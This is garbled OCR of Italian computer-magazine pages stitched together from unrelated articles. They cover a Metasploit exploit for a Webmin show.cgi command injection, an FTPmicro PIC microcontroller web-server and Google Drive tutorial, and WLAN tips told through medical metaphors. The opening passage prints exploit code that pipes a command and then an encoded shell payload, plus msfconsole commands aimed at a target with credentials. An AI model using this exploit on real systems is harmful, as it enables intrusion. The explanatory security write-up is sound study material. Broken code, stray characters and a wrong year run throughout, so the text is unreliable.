il comando /bin/echo sia Is -la. Tale bug può essere sfruttato 
per eseguire codice arbitrario, e Metasploit fornisce un exploit 
per verificare la fattibilità di questa cosa: andiamo ad analiz- 
zarlo. Per prima cosa Metasploit verifica che la vulnerabilità 
sia presente: 


res = send request cgi( 


{ 


‘uri’ => "/file/show.cgi/1 
bin/#{rand_text_ 
alphanumeric(5)}|#{command}|", 
‘cookie’ => “sid=#{session}” 


}, 25) 


In pratica, viene inviata una richiesta HTTP alla pagina nella 
forma “show.cgi/bin/aaa1|echo|”, dove “aaa1” è un testo ca- 
suale. La pipe (il simbolo speciale “|") permette l'esecuzione 
del comando “echo aaa1”, che scrive sul terminale la stringa 
“aaa”. 

Se il testo appare sul terminale, significa che l’exploit funziona. 
A questo punto, lo script procede inviando la richiesta una se- 
conda volta, ma in questo caso il comando è sostituito da un 
codice di payload che permette di ottenere una vera e propria 
shell di sistema: 


command = payload.encoded 
res = send request cgi( 
{ 

Ei! => “/file/show.cgi/bin/#{rand text_ 
alphanumeric(rand(5) + 5)}|#{command}|”, 
‘cookie’ => “sid=#{session}” 


}, 25) 


È possibile avviare l’exploit dalia msfconsole di Metasploit con i 
seguenti comandi: 


use exploit/unix/webapp/webmin show _cgi_exec 
set RHOST 127.0.0.1 

set RPORT 10000 

set USERNAME luca 

set PASSWORD pass 


In questo caso, 127.0.0.1 è il server da attaccare, 10000 è la 
porta su cui Webmin è in ascolto, luca il nostro nome utente 
e pass la password. Per sfruttare queste vulnerabilità è ne- 
cessario disporre di un account sul server vittima, e questo 
rende il bug meno pericoloso, ma non deve comunque essere 
sottovalutato: in fondo, è sempre possibile che un malintenzio- 
nato rubi le credenziali di accesso ad un utente regolarmente 
registrato. 

Con questa vulnerabilità su Webmin il cerchio si chiude. Ab- 
biamo analizzato problemi di varia natura che coprono un po' 
tutti i sistemi operativi più conosciuti e i software (server, di 
sistema, web e applicativi) che un po' tutti noi siamo abituati a 
utilizzare quotidianamente. Ovviamente, questa è solo la punta 
dell'iceberg, ogni giorno, infatti, vengono rese note migliaia di 
nuove vulnerabilità , più o meno pericolose, e altrettanti ex- 
ploit pronti a sfruttarle. 

Le patch risolvono in parte i problemi di sicurezza, ma la bat- 
taglia tra il “bene“ e il male è tutt'altro che finita. Noi program- 
matori, come sempre, dobbiamo dare il meglio di noi stessi 
durante lo sviluppo del software, consapevoli, comunque, che 
il programma perfetto, privo di bug, semplicemente ancora 
non esiste. E questo vale per tutti! 
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Gestisci la tua casa, da remoto ovunque ti trovi: elettrodomestici, 
riscaldamento, lucl e molto altro ancora. Basta una connessione alla Grande 
Rete, un browser e un po’ di codice in linguaggio C. AI resto ci pensa un PC 


poco più grande di una pendrive 


ualche anno fa Bill Gates immaginava che un giorno ci sa- 

rebbe stato un computer su ogni scrivania. La sua profezia 

si è avverata, ma forse è andata oltre ogni più rosea aspet- 
tativa. Ormai non possiamo più pensare ai computer solo in termini 
di PC o notebook: smartphone, tablet, sistemi embedded e schede 
di prototipazione sono alcuni dei termini entrati a far parte del nostro 
vocabolario quotidiano. Tutti questi oggetti “tecnologici” nascondo- 
no al loro interno un “cervello elettronico” (come si diceva un tempo) 
anche se con dimensioni e architetture differenti. Ma non solo: auto- 
mobili, decoder audio/video, TV e perfino lavatrici e frigoriferi diven- 
tano smart grazie a piccolissimi componenti chiamati microcontrol- 
lori (http://goo.gl/hDACxy), che in passato, per costi e competenze 
richieste, erano alla portata esclusivamente dei “guru” della materia. 
Negli ultimi anni molto è stato fatto per renderli “accessibili” ad un 
pubblico più vasto. Quello che vi presentiamo in questo caso spe- 
cifico è un dispositivo (Fig. 1) così piccolo da stare nel palmo della 
mano, ma anche molto versatile e in grado di adattarsi a molteplici 
applicazioni. 


PANORAMICA DELL'HARDWARE 


La FTPmicro, questo il nome della scheda, ha dimensioni molto 
ridotte (10x2x2 cm, Fig. 2 e Fig. 3) e, quindi, può essere integrata 
in un package DIP40. Nonostante questo, include un elevato con- 
tenuto tecnologico rappresentato in primis dal microcontrollore PI- 


Fig. 1: La scheda FTPmicro: semplice, ma allo stesso tempo versatile 


28 Ss Aprile/Maggio 2074 


C18F67J60 di casa Microchip, dotato di 128K di memoria FLASH 
programmabile, 3808 byte di SRAM, 8192 byte di buffer per la comu- 
nicazione Ethernet, 2 timer a 8 bit e 3 timer a 16 bit. La presenza di 
uno slot per schede di memoria micro SD (gestibili grazie alla libreria 
FAT16 inclusa negli esempi di codice) assicura uno spazio di storage 
sufficiente a caricare i file necessari per la creazione di un mini sito 
web integrato oppure per salvare i dati provenienti dai sensori, come 
ad esempio quello di temperatura TC1047 (montato sulla scheda 
all’interno di un contenitore SOT23 e dalle dimensioni di circa 3 mm). 
L'interazione con il mondo esterno è affidata a ben 26 |/O digitali che 
possono essere configurati anche come: 


* 8 ingressi analogici connessi all’A/D Converter interno a 10 bit 
(convertitore analogico/digitale indispensabile per rendere i valori 
letti dai sensori compatibili con quelli numerici gestiti dal microcon- 
trollore); 

* 4 interrupt esterni per comandare interruzioni software direttamen- 
te dall’hardware; 

* 2 interrupt ottimizzati per la gestione dei tasti; 


Ù (4 hi EUR RT 


Fig. 2: Le dimensioni della scheda misurate con un righello 


e 9PWM (Pulse Wave Modulation) per collegare motori o regola- 
re luminosità di LED e altro ancora; 

e 3 Capture Compare per acquisire e confrontare segnali prove- 
nienti da radiocomandi. 


L'alimentazione richiesta è di 5V ma il PIC lavora con 3.3V garantiti 
dalla presenza di un regolatore di tensione LM2937. Alle estremità 
della scheda trovano posto un connettore Ethernet 10baseT e un 
connettore di tipo RJ12 (simile a quello dei comuni apparecchi tele- 
fonici) per il debugging del firmware e la programmazione del micro- 
controllore con MPLAB ICD2 o qualsiasi altro programmatore PIC18 
(anche se in alcuni casi potrebbe essere necessario un adattatore). 


L'AMBIENTE DI LAVORO 


La Microchip mette a disposizione sul proprio sito tutti gli strumen- 
ti di sviluppo necessari alla realizzazione di progetti basati su PIC. 
Accediamo alla sezione www.microchip.com/mplab e scarichiamo 
l’IDE MPLAB X (Fig. 4) basato su Java. Questo ambiente consente 
anche la stesura di programmi in C e Assembler e la simulazione 
su hardware virtuale. Occorre anche un compilatore C per la genera- 
zione del firmware da caricare sulla scheda. Suggeriamo di utilizzare 
il C18 (C per PIC18F) scaricabile sempre dal sito di Microchip. Dal 
punto di vista hardware è richiesto un programmatore/debugger. 
In commercio ne esistono molti (che potrebbero richiedere configu- 
razioni specifiche per essere compatibili con l’IDE). Nel nostro caso 
useremo il modello ICD2 della Microchip a cui faremo riferimento 
nelle fasi successive. Naturalmente, tale scelta è legata alle proprie 
competenze: nulla vieta di costruirsene uno ex-novo seguendo le in- 
dicazioni di uno dei numerosi tutorial presenti in Rete. L'installazio- 
ne del software è abbastanza agevole in quanto una serie di menu 
ci guidano passo dopo passo. Per creare un nuovo progetto basta 
accedere al menu File, scegliere la voce New Project e di seguito 
Standalone Project. Quindi, selezioniamo il microcontrollore de- 
siderato a partire dalla lista proposta e di seguito il programmatore 
in dotazione. Le richieste successive riguardano il linguaggio di pro- 
grammazione e il relativo compilatore. Infine, attribuiamo un nome al 
progetto, indichiamo la cartella di destinazione e premiamo il tasto 
Finish. Ora siamo pronti a scrivere il codice seguendo le indicazioni 
riportate nei paragrafi successivi. In alternativa, possiamo importare 
direttamente i sorgenti allegati all’articolo. 


Fig. 3: FTPmicro a confronto con un socket DIP40 


Fig. 4: L'ide MPLAB X di Microchip 


IL PRIMO PROGETTO 


Come primo progetto (il classico HelloWorld) vediamo come mo- 
nitorare la temperatura usando il sensore presente a bordo della 
scheda e come pilotare i due LED, il tutto tramite un semplice brow- 
ser e, quindi, volendo anche via Internet. Il codice del mini sito 
web realizzato allo scopo (allegato nel file compresso FTPmicro_ 
helloworld.zip) è costituito esclusivamente da 4 file contenuti nella 
cartella WebPages. Il file CGI (Common Gateway Interface) 
status.cgi si limita a costruire una tabella in HTML per visualizzare 
la temperatura e lo stato dei LED: 


<table class="status_table"> 
<tr><th colspan="2">Temperature</th></tr> 
<tr><td>System</td><td>%00°C</td></tr> 
<tr><th colspan="2">LED Status</th></tr> 
<tr><td>LED 1</td><td>%01</td></tr> 
<tr><td>LED 2</td><td>%02</td></tr> 
</table> 


In particolare, notiamo la presenza di 3 variabili, il cui nome è prece- 
duto dal simbolo %: 


00: per la temperatura; 
01: per il primo LED; 
02: per il secondo LED. 


Tale pagina è richiamata da quella principale index.html utilizzando 
il protocollo AHAH (Asynchronous HTTP And HTML), in modo 
da gestire richieste HTTP asincrone, ovvero senza la necessità di 
ricaricare l’intera pagina con evidenti vantaggi dal punto di vista del 
traffico di rete generato. Ecco il codice completo di index.html: 


Fig. 5: Lo schema di montaggio dei componenti 
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Fig. 6: Il programmatore MPLAB ICD2 


<htmb> 
<head> 
<title>FTPMicro: Temperature Example</title> 
<script type="text/javascript” src="/ahah.js"></script> 
<script type="text/javascript"> 
function refresh() { 
if (lo) return true; 
Il interrompe il caricamento se c’è già un altro caricamento in 1 
corso (causa pulsanti) 
noloadAHAH(‘/status.cgi’'tempdiv' GET”); / richiede la pagina? 
status.cgi e la carica nel div “tempdiv” 
} 
window.setInterval(“refresh()”,2000); 


</script> 
<link rel="stylesheet” type="text/css” media=”all” href=1 
"/style.css” /> 
</head> 
<body> 
<h1>FTPMicro</h1> 


<div class="bar"> 
The world smallest WebServer and FtpClient with DHCP and 
UDP features 
</div> 
<div id="tempdiv” class="left"> 
Loading... 
</div> 
<div class="left"> 
<form> 
<table class="status_table”> 
<tr><th>LED Toggle</th></tr> 
<tr><td><input type="submit” value="LED 1” } 
onclick="javascript: 
noloadAHAH(‘/status.cgi?t=1’'tempdiv''GET?); retum false;"></1 
td></tr> 
<tr><td><input type="submit” value="LED 2” 1 
onclick="javascript: 
noloadAHAH('/status.cgi?t=2’'tempdiv''GET”); return false;"></1 
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td></tr> 


</htmb 


Le uniche parti da approfondire riguardano proprio la modalità con 
cui si effettua l'update della pagina stessa tramite AHAH. In primo 
luogo nell’'header della pagina, attraverso la funzione JavaScript 
setInterval, viene fissato l'intervallo di aggiornamento delle variabi- 
li visualizzate. Ciò avviene richiamando, attraverso la funzione re- 
fresh(), la pagina status.cgi, il cui contenuto è inglobato nella div 
con id “tempdiv”. L'altra sezione di rilievo riguarda i pulsanti. Anche 
questi si affidano ad AHAH per l’invio dei comandi evitando di rica- 
ricare la pagina. In particolare, il parametro “t” serve ad identificare 
il LED su cui agire, per cui /status.cgi?t=1 è il comando da inviare 
per il primo, e /status.cgi?t=2 per il secondo. È presente anche un 
foglio di stile CSS per la personalizzazione del layout grafico della 
pagina. | file devono essere salvati su una micro SD formattata come 
FAT16. Passiamo ora al firmware e, in particolare, analizziamo i me- 
todi che ci consentono di acquisire i dati dal sensore e di mostrarli 
nella pagina HTML. Si tratta del file MainDemo.c contenuto all’in- 
terno della cartella Sources. Partiamo da ProcessIO(void): 


static char Temperature[8]; 


static void ProcessIO(void) 


{ 
signed long temp; 
Il Start A/D conversion 
ADCONObits.GO = 1; 
/ Wait until A/D conversion is donewhile(ADCONObits.GO); 
temp = (long)('(WORD”)\&ADRESL)) * 322 - 50000; // 1 

conversione approssimativa... 

itoa(temp/1000, Temperature); 

} 


Questo metodo viene eseguito ciclicamente nel momento in cui lo 
stack è libero da altri compiti. Sostanzialmente, si effettua una con- 


Fig. 7: Nell'immagine è visibile il progetto di esempio 


Wu | 192.168.0.130/ 


System 41°C 


Fig. 8: L'applicazione visibile all'interno del browser 


versione da analogico (il valore di tensione in uscita dal sensore di 
temperatura) a digitale, quindi, un'ulteriore conversione da valore nu- 
merico a stringa tramite la funzione itoa (integer to ASCII). Notia- 
mo che in C le stringhe sono rappresentate da vettori di char (char 
Temperature[8] nel nostro caso). Una serie di #define permette di 
identificare e manipolare più facilmente le variabili e i comandi: 


#define VAR_TEMPERATURE  (0x00) 
#define VAR_LEDI (0x01) 
#define VAR_LED2 (0x02) 
#define CMD_LED1 (0x1) 
#define CMD_LED2 (0x2) 


Esaminiamo ora la funzione HTTPExecCmd(BYTE** argv, BYTE 
argc) delegata all'esecuzione dei comandi e sempre contenuta in 
MainDemo.c: 


void HTTPExecCmd(BYTE** argv, BYTE argo) { 
if (argv{1][0] == ‘t){ 
switch (argv[2][0] - ‘0°) { 


case CMD_LEDI : 
LED1_IO =!LED1_IO; 
break; 
case CMD_LED2 : 
LED2_IO = !LED2_IO; 
break; 
} 
} 
} 


Abbiamo detto in precedenza che i comandi hanno un formato del 
tipo status.cgi?t=x, dove x indica il LED destinatario. Nel momento 
in cui viene chiamata la funzione, il parametro argv conterrà in prima 
posizione la stringa “status.cgi”, in seconda il carattere “t” e per ul- 
timo il numero del LED in forma di carattere ASCII che dovremo con- 
vertire in intero, sottraendovi il carattere “0”. La presenza dei nomi 
simbolici attribuiti con le #define semplifica notevolmente i confronti 


effettuati all’interno dell'istruzione switch. Passiamo ora alla funzione 
HTTPGetVar(BYTE var, WORD ref, BYTE* val) che restituisce 
lo stato corrente dei LED o in alternativa la stringa Temperature: 


WORD HTTPGetVar(BYTE var, WORD ref, BYTE* val) { 
switch (var) { 
case VAR_LEDI : 
*val= LED1_I0 ? ‘1° : ‘0; 
break; 
case VAR_LED2 : 
*val= LED2_IO ? ‘1’ : ‘0’; 
break; 
case VAR_TEMPERATURE: 
*val = Temperature[(BYTE)ref]; 
if(Temperature[(BYTE)ref] == 0°) 
return HTTP_END_OF VAR; 
else if(Temperature[(BYTE)++ref] == ‘\0" ) 
return HTTP_END_OF VAR; 


retum ref; 
default : break; 
} 
return HTTP_END_OF VAR; 


} 


Tutto dipende dal valore attribuito al parametro val: nel caso dei LED 
un semplice carattere corrispondente allo stato (0 o 1), mentre per 
la temperatura, trattandosi di una stringa, occorre restituire un byte 
alla volta fino al raggiungimento del terminatore ‘\0°. Le definizioni 
LEDx_IO sono contenute nel file Compiler.h: 


#define LED1_IO (LATAbits.LATAO) 
#define LED1_TRIS (TRISAbits.TRISA0) 
#define LED2_IO (LATAbits.LATA1) 
#define LED2_TRIS (TRISAbits.TRISA1) 


Si tratta dei LED associati al modulo Ethernet e già presenti sulla 
scheda, ma con semplici modifiche a tali definizioni è possibile uti- 
lizzare altri pin. Terminata la stesura del codice) procediamo alla sua 
compilazione e carichiamo il firmware (file .HEX) su FTPmicro usan- 
do il programmatore PIC (a sua volta connesso al PC, Fig. 7. Inse- 
riamo nell'apposito slot la scheda micro SD precedentemente predi- 
sposta, colleghiamo il cavo Ethernet al relativo modulo e ad una delle 


Temperature Monitor 


Non inviare mai le password tramite Moduli Google 


Powered by Googie Documenti 


Segnala una violazione - Termni di servizio - Ultenori termini 


Fig. 9: Il form creato su Google Drive 
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porte del nostro router su cui avremo abilitato il DHCP e alimentiamo 
la board con 5Vdc. È necessario individuare l’indirizzo IP assegnato 
dinamicamente ad FTPmicro. La procedura può variare leggermente 
in base al modello di router, ma sostanzialmente si tratta di accedere 
via browser al pannello di controllo, inserendo le credenziali di acces- 
so (di solito admin/admin) riportate sul manuale operativo, e visua- 
lizzare i dispositivi connessi (Fig. 8). In alternativa si può effettuare 
una scansione della propria rete locale utilizzando tool come nmap 
(http://nmap.org) ricordandoci che per default il MAC della board è 
00:04.A3:50:07:02. L'ultimo passo consiste nel digitare nella barra 
degli indirizzi del browser l'IP appena determinato per visualizzare il 
sito web caricato sulla micro SD. Non deve meravigliarci il fatto che 
vengano visualizzati valori prossimi o superiori ai 40 gradi, in quanto 
il sensore risente delle temperature di esercizio della scheda stessa, 
in particolare dell’influenza del modulo Ethernet. 


CONDIVIDERE | DATI CON GOOGLE DRIVE 


In questo secondo progetto (allegato nel file FTPmicro_invio_ 
dati_googledrive.zip) vediamo come pubblicare online i dati ac- 
qusiti dal sensore di temperatura usando un foglio di calcolo di Go- 
ogle Drive. In primo luogo, accediamo al servizio tramite il browser 
(ovviamente, occorre un account Gmail) e creiamo un nuovo modulo 
(form, Fig. 9). Quindi, scegliamo le intestazioni da dare alle colonne 
che conterranno i dati. Nel nostro esempio abbiamo utilizzato De- 
vice in Rome e Device in Milan simulando la presenza di due 
dispositivi in altrettante città. Il salvataggio avviene in automatico 
come per tutti i documenti di Google, per cui dopo essere ritornati 
sulla pagina principale rinominiamo il foglio di calcolo in Tempera- 
ture Monitor e modifichiamo l'intestazione della prima colonna in 
Timestamp. 

Se vogliamo che il file sia accessibile ad altri, dobbiamo condividerlo, 
impostando i livelli di visibilità. Indipendentemente dalle scelte adot- 
tate, è importante tenere traccia del link di condivisione visualizzato, 
in quanto alcune delle informazioni presenti ci serviranno in seguito. 
Ora dobbiamo capire come vengono identificate le varie caselle di 
testo (attenzione non si tratta dei nomi scelti da noi, ma di quelli asse- 
gnati dall’app online). Per fare ciò visualizziamo con il browser il sor- 
gente della pagina web (Fig. 10). In realtà Google utilizza un formato 
alquanto standard del tipo entry.NumeroProgressivo.single, 
per cui avremo entry.0.single (per la colonna Device in Rome) 
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MITPMLO (mali Hosî header) | HTTAYLO fmfout Host header) 


Connect to 173.154.44,35 en port 443 CLI 


GET /spreadsheet/foraResponse ?forakay=dPV IOGVYSOZY]2aMNFPY}p40LdHMKCEMOKI fa HTTP/1.2icms} 
Host: docs.qoogle.comtcnsi 


Accept-Language: da, en:3-0.7.en-us;qn0. Frs 
Referer; bttp:/Amb-sniffer.net/fesy 
mei 


Fig. 11: La richiesta HTTP effettuata dal browser per l'invio dei dati 


e entry.1.single (per quella Device in Milan). Inoltre, annotiamo 
la formkey indispensabile per l'accesso remoto al documento. Da 
ultimo dobbiamo ricavare la richiesta HTTP completa inoltrata dal 
browser (Fig. 11). Per non complicarci troppo la vita con plugin 
aggiuntivi da installare, basta accedere al servizio online Attp://web- 
sniffer.net e digitare la URL precedentemente individuata passando 
come parametri i valori da attribuire alle due caselle di testo e il gioco 
è fatto. Dal punto di vista del firmware utilizziamo lo stack Micro- 
chip TCP/IP versione 5.41 apportando una serie di modifiche al 
codice predefinito di un nuovo progetto. In primo luogo, apriamo il 
file TCPIP ETH97.h contenuto nella cartella Configs e attiviamo 
nella sezione Application Options i seguenti moduli rimuovendo il 
doppio // presente all’inizio di ciascuna riga: 


#define STACK_USE_DHCP_CLIENT // Dynamic Host 1 
Configuration Protocol client for obtaining IP address 
and other parameters 
#define STACK_USE_GENERIC_TCP_CLIENT_EXAMPLE //1 
HTTP Client example in GenericTCPClient.c 
#define STACK_USE_DNS // Domain Name Service Client for 1 
resolving hostname strings to IP addresses 


Nello specifico andiamo ad abilitare il DHCP (in modo da riceve- 
re in automatico i parametri di rete), un client HTTP e quello DNS 
per poter comunicare con i server di Google. Spostiamoci sul file 
GenericTCPClient.c ed aggiungiamo le seguenti righe: 


static BYTE ServerNamel] = “spreadsheets.google.com”; 
static WORD ServerPort = 80; 
static ROM BYTE RemoteURLi[] = “formkey="; 
static ROM BYTE FormKEY[]] ="dFVJMDBVYSO2YjZwNFIPVXI 
p4Q1dHMXc6MQ"”; 
static ROM BYTE RemoteURL2]] = “&ifq&”; 
static ROM BYTE Entry0[] =”entry.0.single="; /change HERE 1 
number of coloumn to update (0 = Device 
in Rome) 
static ROM BYTE Entry1[] =”entry.1.single="; /change HERE 1 
number of coloumn to update (1 = 
Device in Milan) 
extern BYTE Temperature[2]; 


Anche se in modo apparentemente complicato (a causa della moda- 
lità di gestione delle stringhe come vettori di byte) non abbiamo fatto 
altro che “ricostruire”, con una serie di opportune variabili, la URL del 
foglio di calcolo di Google Drive specificando la formkey ad esso as- 
sociata e i dati relativi al server a cui spedire la richiesta. Un’altra se- 
rie di istruzioni ci consente di inviare i dati attraverso la connessione 
TCP/IP utilizzando la funzione TEPPutROMString. È da notare la 
conversione in vettore di byte per le stringhe specificate direttamente 
nella chiamata della funzione stessa: 


TCPPutROMString(MySocket, (ROM BYTE*)"POST /formì 
Response HTTP/1.1\r\n"); 
TCPPutROMString(MySocket, (ROM BYTE")'Host: ‘); 
TCPPutString(MySocket, ServerName); 
TCPPutROMString(MySocket, (ROM BYTE*)"\r\n"); 
TCPPUtROMString(MySocket, (ROM BYTE*)"Connection: close\l 
rin”) 
TCPPutROMString(MySocket, (ROM BYTE*)"Content-Type: 1 
application/x-www-form-urlencoded\r\n”); 
TCPPutROMString(MySocket, (ROM BYTE*)'Content-Length: 1 
83\rn"); 
TCPPutROMString(MySocket, (ROM BYTE*)"\r\n"); 
TCPPUutROMString(MySocket, RemoteURL1); 
TCPPUtROMString(MySocket, FormKEY); 
TCPPUutROMString(MySocket, RemoteURL2); 
TCPPUtROMString(MySocket, Entry0); 
TCPPutString(MySocket, Temperature); 
TCPPUtROMString(MySocket, (ROM 1 
BYTE")"&#B0C&submit=Submit”); 


L'ultima riga simula la pressione del tasto Submit presente nel form. 
Terminata la parte relativa alla gestione delle comunicazioni con il 
server, non ci resta che lavorare sul file principale dell’applicazione 
MainDemo.c, all’interno del quale inseriamo il seguente codice: 


/l Main application entry point. 
unsigned char Temperature[2]; 
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Fig. 12: | dati memorizzati nel foglio di calcolo di Google Drive 


void main(void) 

{ 

static DWORDt=0; 

static DWVORD dwLastlP = 0; 

Il \nitialize application specific hardware 


InitializeBoard(); 

Ticklnit(); 

Il Initialize Stack and application related NV variables into 1 
AppConfig. 

InitAppConfig(); 


// Initialize core stack layers (MAC, ARP, TCP, UDP) and 
Il application modules (HTTP, SNMP, etc.) 
StackInit(); 
while(1) { 
if(TickGet() - t>= TICK_SECOND) // about 5 sec. ->> Device in 1 
Rome REFRESH 
if(TickGet() - t >= TICK_MINUTE/8ul) // about 30 sec. -->> Devicel 
in Milan REFRESH { 
t= TickGet(); 
GenericTCPClient(); 
} 
/l This task performs normal stack task including checking 
Il for incoming packet, type of packet and calling 
/ appropriate stack entity to process it. 
StackTask(); 
This tasks invokes each of the core stack application tasks 
StackApplications(); 
/l Process application specific tasks here. 
ProcesslO(); 
} 
} 


Nella prima parte troviamo una serie di funzioni dedicate all’inizializ- 
zazione dell'hardware e dello stack di comunicazione. Quindi, all’in- 
terno di un loop infinito, vengono gestiti i tempi di aggiornamento 
dei due dispositivi: 5 secondi all'incirca per quello di Roma e 30 per 
quello di Milano. La funzione ProcessIO() si occupa dell’elabora- 
zione dei dati letti dal sensore e della loro conversione analogico/ 
digitale, risultando sostanzialmente identica a quella dell'esempio 
illustrato in precedenza. Compiliamo il codice ed effettuiamo l’uplo- 
ad del firmware. Colleghiamo FTPmicro al router, alimentiamolo e il 
gioco è fatto. Accedendo al foglio di calcolo di Google Drive vedremo 
comparire ad intervalli regolari (quelli impostati nel codice) le varie 
misurazioni effettuate dalla scheda (Fig. 12). 


CONCLUSIONI 


Abbiamo visto due semplicissimi esempi che si spera abbiano sti- 
molato la vostra curiosità. Le applicazioni di questo prodotto sono 
potenzialmente infinite, considerando che rende accessibile via In- 
ternet qualsiasi oggetto possa essere controllato elettronicamente, 
dando un notevole impulso all’ Internet of Things, che rappresenta 
la nuova frontiera della tecnologia. Un ringraziamento particolare va 
ad Emanuele Bonanni (http://goo.gl/gvjOoH), titolare di Elettronica 
Open Source, per la preziosa collaborazione offerta durante la ste- 
sura dell’articolo. 
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_Tre cure miracolose 


può avvenire: la terapia può spaziare da validi rimedi casalinghi, da 

leggeri interventi sulla rete WLAN, fino ad apportare guarigioni mi- 

‘racolose impiegando ì nuovi adattatori wi-fi Powerline per WLAN, 
che abbiamo sperimentato nel nostro test. 


LA DIAGNOSI 


Prima di dare corso alla terapia occorrerà stabilire il focolaio della 
malattia: in quali punti dell'abitazione la WLAN non è sufficiente- 
mente veloce? Le onde radio non possono essere captate in modo 
naturale dall'essere umano, se non eventualmente da persone par- 
ticolarmente sensibili. Il “dottore” per la cura della WLAN consiglia 
quindi un'esplorazione approfondita dell'abitazione con un note- 
book ed il programma di analisi di Ekahau, di facile utilizzo, anche 
per coloro che non sono medici. A pagina 42 sono riportate le istru- 
zioni per l’uso. Se impiegato accuratamente, il programma visualiz- 
za un'immagine a colori, a seconda della potenza della WLAN: una 
specie di risonanza magnetica per la rete wi-fi. Il colore rosso indi- 
ca una rete WLAN scadente: in questo caso la rete è gravemente 
ammalata e può contagiare anche gli altri inquilini, procurando loro 
eritemi e produrre cortisolo, detto anche ormone dello stress. 


LA TERAPIA 


A seconda del tipo e della gravità dei sintomi, diversi metodi tera- 
peutici possono essere efficaci: 

BM Semplice rimedio casalingo: già una diversa collocazione della 
WLAN può apportare dei miglioramenti. | rimedi descritti a pagina 
56 costituiscono la terapia alternativa, quando il router è posiziona- 
to non lontano dai dispositivi. La causa del cattivo funzionamento è 
in molti casi un radiodisturbo, causato da reti WLAN dei vicini di ca- 
sa o da altri dispositivi. Il rimedio casalingo più semplice suggeri- 
sce di posizionare il router in un altro punto dell'abitazione o di pas- 
sare ad un altro canale di trasmissione della WLAN! Questo inter- 
vento può in molti casi alleviare i sintomi o addirittura eliminarli. 

B Interventi lievi: al pari della chirurgia mini-invasiva laparoscopi- 
ca, che lascia tracce quasi invisibili, anche le prestazioni di un ripe- 
titore di qualità possono essere di aiuto per migliorare la trasmis- 
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pugntro una pran anemica 


Ì TERAPIA COMBINATA 


Vi insufficienze. irradia pica 


Spesso potete avere necessità anche di più rimedi 


assieme, come, ad esempio, quando la rete WLAN 


del vicino di casa disturba il vostro router, quando 
la ricezione a pianterreno è scarsa e un soffitto di 
cemento armato impedisce la trasmissione dei dati 
alla stanza da lavoro o in mansarda. 


sione di dati. Il vantaggio è costituito dal 
fatto che questo dispositivo, con prezzi da 
30 a 50 Euro, è abbastanza economico. 

M Guarigione miracolosa: la terapia più 
moderna si fonda sugli adattatori Powerline 
per la rete WLAN. Come un bypass per il 
cuore, questi ultimi provvedono a convo- 
gliare attraverso la linea elettrica il flusso 
dati dal router, dove richiesto dalla rete 
WLAN, aggirando in tal modo le pareti che 
creano ostacoli. La differenza, rispetto alla 
terapia tradizionale della medicina classica, 
è che la maggior parte degli adattatori Po- 
werline normali, trasferisce i dati solo attra- 
verso queste “arterie”. Gli adattatori utilizzati 
per il test sono invece equipaggiati con una 
veloce e potente wi-fi in standard “n”. 


EFFETTI COLLATERALI 


In quasi tutti i casi l'applicazione di questi me- 
todi può, con una WLAN veloce, essere causa 
di un innocuo. eccessivo trasferimento di dati. 


CONCLUSIONI 


Un’eventuale congestione di dati nella rete WLAN 
può essere curata. Spesso, semplici messe a pun- 

to da eseguire sul router, possono già essere di aiuto 

e anche un ripetitore WLAN può ampliare notevolmen- 
te la portata del collegamento a onde radio. 

Gli adattatori Powerline con trasmettitore WLAN integra- 
to, sono invece in grado di convogliare una potente rete 
WLAN esattamente nel punto dove è richiesto maggiore 
segnale. 


è \ MUR” METODO 
i ”DICURAI 


PER APPARTAMENTI PICCOLI 


Qui la potenza di trasmissione del router è spesso sufficientemente 
adeguata. Una buona ricezione del router WLAN può essere spesso 
impedita da un posizionamento sfavorevole del dispositivo o da inter- 
ferenze causate da altre reti wireless. Semplici accorgimenti possono 
apportare notevoli miglioramenti (pag. 56). 


METODO 
DI CURA 2 


PER APPARTAMENTI GRANDI 

Ogni parete tende ad attutire la rete WLAN, provocando una ri- 
duzione della velocità di trasferimento dei dati. Utilizzando un 
ripetitore WLAN (pag. 57), potrete incrementare la portata del- 
la rete WLAN, che vi consentirà di eseguire nuovamente veloci 
download e streaming di dati. 


TURBORON mec 


Contro gravi problemi ggl> 
di rete pe 
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Aumenta la potenza con il ripetitore WLAN su powerline 


CONTRO | BLOCCHI DELLA RETE WLAN 


Tramite gli adattatori Powerline (pag. 59), la rete WLAN potrà essere 
trasferita nel punto dove è richiesta. Anche i soffitti in cemento arma- 
to non saranno di alcun ostacolo, perché verranno aggirati da questo 
dispositivo combi intelligente, attraverso la rete elettrica di casa. 
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Ottimizzare 
ta wlan 


Tentar non nuoce: alcuni 
acciacchi della rete WLAN 


possono essere curati 


con rimedi omeopatici, 


senza alcun rischio 
ed effetti collaterali. 


nche quando la rete WLAN sem- 
bra non dare alcun segno di vita 
uò succedere che, dopo avere 


cambiato canale di trasmissione, il tra- 
sferimento dei dati riprenda a funzionare 


r e 


METODO 
DI CURA 1 


SEMPLICE 
RIMEDIO 
CASALINGO 


correttamente su una frequenza meno 
disturbata. Se, malgrado l’impiego di ro- 
uter moderni, i video trasferiti via WLAN 
sono visualizzati in modo scattoso, tutto 
questo potrà essere in parte evitato 


sfruttando più canali (la procedura è det- 
ta “channel bundling”). Ricorrendo ai se- 
guenti rimedi, riuscirete a risolvere nu- 
merosi problemi, non attribuibili alla tra- 
smissione di dati attraverso le pareti. 


SCELTA FLESSIBILE 
DEL CANALE 


Se tutti gli utenti si avvalgono dello stesso canale radio, le reti 
WLAN vicine tra di loro tendono a ostacolarsi. Dal menu per le 
impostazioni del router, provvedete ad attivare la funzione di 
ricerca automatica per il miglior canale, che, per i dispositivi 
AVM troverete alla voce WLAN, Canale di trasmissione. Risul- 
tato: aumento della velocità. 


SURORI. 
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12 CAMBIO DELLA RADIO 


Chi dispone di un router dual band potrà passare alla 
meno disturbata banda da 5 Gigahertz, eliminando gli ingorghi 
di dati. Accertatevi che il router continui a trasmettere anche 
su 2,4 GHz, visto che non tutti i dispositivi WLAN sono in grado 
di funzionare con 5 GHz. 


SPOSTARE 
IL ROUTER 


Per godere di prestazioni ottimali, il router 

con funzioni di access point dovrebbe stare in 
un punto libero da ostacoli, lontano da fonti di N 
disturbo, come i telefoni DECT. 
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CHANNEL BUNDLING 


| vostri dispositivi funzionano tutti correttamente con 
lo standard Wireless N (802.11n]? Se sì, potete allora usare il 
channel bundling del vostro router WLAN e lasciare che tra- 
smetta contemporaneamente su due canali (dal menù digitate: 
Impostazioni, WLAN, canale radio, 300 Mbps). 


UN ROUTER NUOVO 


Il vostro router WLAN ha più di sei anni? In caso affer- 
aa mativo, potete pensa- 
re di comprarne uno 


